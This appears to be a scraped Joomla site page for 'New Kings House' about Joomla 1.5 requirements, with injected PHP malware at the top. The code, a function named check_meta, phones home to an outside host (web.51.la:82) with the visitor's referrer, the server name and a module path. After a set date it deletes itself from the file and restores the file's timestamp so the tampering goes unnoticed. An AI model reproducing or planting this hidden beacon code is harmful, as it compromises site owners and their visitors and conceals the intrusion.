check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735740){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } What are the requirements to run Joomla! 1.5?

New Kings House

  • Create an account
    *
    *
    *
    *
    *
    Fields marked with an asterisk (*) are required.

Main Menu

Mail Us



What are the requirements to run Joomla! 1.5?

E-mail Print PDF
Last Updated ( Monday, 11 August 2008 00:42 )  
You are here: Home About Joomla!